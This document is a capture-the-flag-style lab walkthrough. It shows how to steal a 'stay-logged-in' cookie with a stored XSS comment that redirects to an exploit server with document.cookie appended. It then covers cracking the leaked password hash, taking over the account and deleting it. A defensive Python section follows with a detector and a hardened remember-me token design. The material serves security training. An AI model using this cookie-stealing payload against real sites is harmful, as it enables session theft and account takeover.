This lab is in the same series as the previous article. The goal here is to steal Carlos’s “stay-logged-in” cookie in order to take over and delete his account.
Lab: Offline password cracking
Click the “My account” button
Enter Wiener’s credentials, select the “stay-logged-in” option and click “Log in”
In Proxy > HTTP History, click the GET request “/my-account” and click on the arrow on the “stay-logged-in” cookie
The base64 string is decoded:
username:password
Click “Home”
Click a “View post” button
In another tab, open the Exploit Server
Copy its URL
At the bottom of the post opened at step 6, add the following payload as a comment (change the URL to that of your exploit server), along with a random name, email address and website URL. Then click “Post comment”:
<script>document.location='https://exploit-server-url.com'+document.cookie</script>
Click “Back to blog”
The blog post will be redirected to a similar page (here on Firefox)
Go back to the exploit server and click “Access log”
A GET request “/exploitserver” appears in the list, containing a “stay-logged-in” cookie; copy its string
Go to base64decode.org, paste the string previously copied to decode it and copy the hashed password, after “carlos:”
Go to crackstation.net and paste the hash to get Carlos’s password
Go back to the lab’s tab and click multiple times on the “Go back” button until you can see the website without being redirected
If needed, click “My account”, depending on the point you have reached using the “Go back” button, and click “Log out”
Click “My account” again
Enter “carlos” as a username and the password previously found at step 16 on Crackstation, “onceuponatime”, and click “Log in”
When you are on Carlos’s “My account” page, click “Delete account”
Paste his password one more time as confirmation and click “Delete account!”
The lab is solved
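Why the cookie in this lab can be cracked offline, and a remember-me design that avoids it, as an added example (not part of the original write-up or the lab's code). The function names, the in-memory token store and the sample values are assumptions made for illustration; the page only says the cookie decodes to a username and a hashed password.

```python
import base64
import binascii
import hashlib
import hmac
import re
import secrets

# Hex digest lengths of common unsalted hashes (32, 40 or 64 hex characters).
HEX_DIGEST = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.I)

def leaks_password_hash(cookie_value):
    """True if the cookie decodes to 'username:<hex digest>', the format seen in the lab."""
    try:
        decoded = base64.b64decode(cookie_value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return False
    user, sep, rest = decoded.partition(":")
    return bool(user and sep and HEX_DIGEST.match(rest))

# Hardened design: the cookie carries only random values and nothing derived
# from the password; the server stores a hash of the random validator.
TOKENS = {}  # selector -> (username, sha256(validator)); stands in for a database table

def issue_token(username):
    selector = secrets.token_urlsafe(12)
    validator = secrets.token_urlsafe(32)
    TOKENS[selector] = (username, hashlib.sha256(validator.encode()).hexdigest())
    return f"{selector}.{validator}"

def verify_token(cookie_value):
    """Return the username for a valid token, otherwise None."""
    selector, sep, validator = cookie_value.partition(".")
    record = TOKENS.get(selector)
    if not sep or record is None:
        return None
    username, stored = record
    candidate = hashlib.sha256(validator.encode()).hexdigest()
    return username if hmac.compare_digest(candidate, stored) else None

def set_cookie_header(token):
    # HttpOnly stops page scripts from reading the cookie through document.cookie.
    return f"Set-Cookie: stay-logged-in={token}; HttpOnly; Secure; SameSite=Lax; Path=/"

# Constructed sample in the weak format (the hash algorithm is an assumption).
WEAK_SAMPLE = base64.b64encode(
    b"exampleuser:" + hashlib.md5(b"example-password").hexdigest().encode()
).decode()
```

Run `leaks_password_hash` over cookie values captured in your own application's test traffic to spot this format; a stolen token from the hardened scheme can still be replayed until revoked, but it reveals nothing about the password.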